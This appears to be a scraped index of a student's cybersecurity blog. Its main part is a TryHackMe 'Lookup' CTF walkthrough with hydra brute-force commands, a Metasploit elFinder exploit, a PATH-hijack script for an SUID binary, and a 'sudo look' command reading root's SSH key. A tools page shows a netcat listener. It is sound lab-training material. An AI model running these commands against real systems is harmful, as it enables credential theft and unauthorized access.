Though it said wrong, we got a flag.\n","date":"28 January 2025","externalUrl":null,"permalink":"/writeups/ctfs/softwarica-hackfest/","section":"Writeups","summary":"","title":"SOFTWARICA HACKFEST 2025","type":"writeups"},{"content":" after gaining the ip of the machine i quickly started an nmap scan\nnmap <machine_ip>\ni found there were two ports running\n22 for ssh and 80 for http # Then I tried to take a peek at the page running on port 80 and realized I had to edit my hosts file\necho \"<machine_ip> lookup.thm\" | sudo tee -a /etc/hosts\nthen accessing the webpage I got a login page where I tried default creds [admin:admin].\nbut it didn’t work and asked me to try again 3 seconds later.\nThen I used wappalyzer to see which version of apache it is using. It was v 2.4.41, for which I tried to search for exploits but couldn’t find any.\nthen I used the hydra tool to gain the password\nhydra -l admin -P ~/Downloads/rockyou.txt lookup.thm http-post-form \"/login.php:username=^USER^&password=^PASS^:Wrong password. Please try again.\"\nhere, hydra will send an http-post request; ‘^USER^’ will be replaced by admin and ‘^PASS^’ will be replaced by each password from rockyou.txt. hydra then checks whether the response contains the wrong-password message; if it doesn’t, it reports that password to us\nand i got a password.\ni tried logging in with this but still couldn’t get in. so i tried to find the username for the obtained password. i found out about login.php from its source code.\nthen i got a username jose\nwith this we can log in to the website.\nand we are redirected to files.lookup.thm which we need to add to our hosts file to access\nwe have two files without locks so i opened them up. test file was empty but creds file had smth\nI thought maybe this is ssh login pass but seems like i fell into a rabbit-hole. But we have a user “think”. 
Then i tried to gather more info from this site and i found this\ni ran searchsploit elfinder and i found its vulnerabilities\nthen i ran metasploit and searched for it: search elfinder 2.1.48 and got one exploit. i used it and after setting some options i ran it and gained a meterpreter shell\nhere the rhosts should have been files.lookup.thm, which i later corrected and it returned a meterpreter shell. after i got the shell i ran a few commands, we were logged in as www-data. so i looked up how i can escalate my privileges to that of a user. we already have a user called ‘think’, so my first thought was to check for login creds. I ran a find command to search for files with perms 4000\nfind / -perm /4000 2>/dev/null\nhere, the interesting one was /usr/sbin/pwm; when i tried to run it, it was searching for a .passwords file.\nthen i went on to the /tmp directory as it is world-writable. i created a file named id there.\necho -e '#!/bin/bash\\n echo \"uid=33(think) gid=33(think) groups=33(think)\"' > id\nalso make id an executable file\nchmod +x id\nthen i ran the /pwm again and got a list of passwords which I saved to a file on my machine. After which i started hydra to bruteforce ssh of the ‘think’ user.\nI successfully got the ssh password and logged in.\nthe user flag was just one ls away. following it I searched for something i could use without root permissions. 
sudo -l\ndoing this i found look so i went to gtfobins and there it was\nwhat we need is the third one\nLFILE=/root/.ssh/id_rsa\nsudo look '' \"$LFILE\"\nthis gives us direct access to .ssh file of root and displays the id_rsa\nI saved this to my machine and gave it perms 600 and sshed to root\nthen root flag is found with just ls\n","date":"27 January 2025","externalUrl":null,"permalink":"/writeups/tryhackme/lookup/","section":"Writeups","summary":"","title":"Lookup","type":"writeups"},{"content":" I am Subeg Suwal (glutto.n) # Hi, I’m Subeg Suwal, a cybersecurity student pursuing a BSc. (Hons) in Cybersecurity and Ethical Hacking at Softwarica College of IT and E-Commerce. I focus on penetration testing, exploit development, and CTF challenges.\nAbout Me #\nEducation: BSc. (Hons) Cybersecurity and Ethical Hacking — Softwarica College\nCertifications: eJPT (eLearnSecurity Junior Penetration Tester) — ID: 177314916\nCTF Player: Active competitor representing Team NCA@Nepal — placed 11th at VishwaCTF 2025\nPlatforms: Regular player on HackTheBox and TryHackMe\nFocus Areas: Web app pentesting, Active Directory attacks, binary exploitation, CTF challenges\nSkills #\nRecon: rustscan, nmap, ffuf, gobuster, feroxbuster\nWeb: SQLi, SSRF, SSTI, LFI, JWT abuse, API security\nActive Directory: BloodHound, nxc/netexec, Kerberoasting, RBCD, ADCS abuse, DPAPI\nExploit Dev: Buffer overflows, ROP chains, format strings, pwntools\nPivoting: Chisel, Ligolo-ng\nLanguages: Python, JavaScript, C, HTML, CSS\nCertifications & Goals #\n✅ eJPT — eLearnSecurity Junior Penetration Tester\n✅ CCPP — Certified C++ Practitioner Professional (Red Team Leaders)\n✅ CCEP — Certified Cybersecurity Educator Professional (Red Team Leaders)\n✅ CRTOM — Certified Red Team Operations Management (Red Team Leaders)\n✅ CTIGA — Certified Threat Intelligence & Governance Analyst (Red Team Leaders)\n🔄 ASCP (API Security Certified Professional) — in progress\n🎯 CPTS — 
Certified Penetration Testing Specialist (planned) Profiles # Platform Handle HackTheBox glutton2 TryHackMe glutto.n GitHub glutton-su LinkedIn Subeg Suwal Discord glutto.n Connect # Email: glutton@subegsuwal.com.np LinkedIn: Subeg Suwal GitHub: glutton-su ","date":"12 December 2024","externalUrl":null,"permalink":"/whoami/","section":"Subeg Suwal","summary":"","title":"whoami??","type":"list"},{"content":"","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"","externalUrl":null,"permalink":"/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"},{"content":" ","externalUrl":null,"permalink":"/certifications/ccep/","section":"My Certifications","summary":"","title":"CCEP","type":"certifications"},{"content":" ","externalUrl":null,"permalink":"/certifications/ccpp/","section":"My Certifications","summary":"","title":"CCPP","type":"certifications"},{"content":" ","externalUrl":null,"permalink":"/certifications/crtom/","section":"My Certifications","summary":"","title":"CRTOM","type":"certifications"},{"content":" ","externalUrl":null,"permalink":"/certifications/ctiga/","section":"My Certifications","summary":"","title":"CTIGA","type":"certifications"},{"content":"","externalUrl":null,"permalink":"/cve-feed/","section":"Subeg Suwal","summary":"","title":"CVEs","type":"page"},{"content":"","externalUrl":null,"permalink":"/certifications/ejpt/","section":"My Certifications","summary":"","title":"eJPT","type":"certifications"},{"content":"","externalUrl":null,"permalink":"/certifications/","section":"My Certifications","summary":"","title":"My Certifications","type":"certifications"},{"content":" glutton-su/SIEM-P2-CW1 Python 0 0 glutton-su/backdoor HTML 0 0 glutton-su/DevSpace This repo contains a web development project called DevSpace JavaScript 1 0 glutton-su/C_program_project C 1 0 
","externalUrl":null,"permalink":"/projects/","section":"Subeg Suwal","summary":"","title":"My Projects","type":"page"},{"content":"","externalUrl":null,"permalink":"/series/","section":"Series","summary":"","title":"Series","type":"series"},{"content":" \u0026#x2663; TOOLKIT v3.0 clear sample log sample b64 recipe clear click ops to add → \u0026#x25B6; bake! inputclear 0 chars0 lines outputcopy→ input 0 chars LHOST LPORT \u0026#x25B6; Generate listener nc -lvnp 4444 filter: all linux windows web ★ stable msfvenom ","externalUrl":null,"permalink":"/tools/","section":"Subeg Suwal","summary":"","title":"Tools","type":"page"}]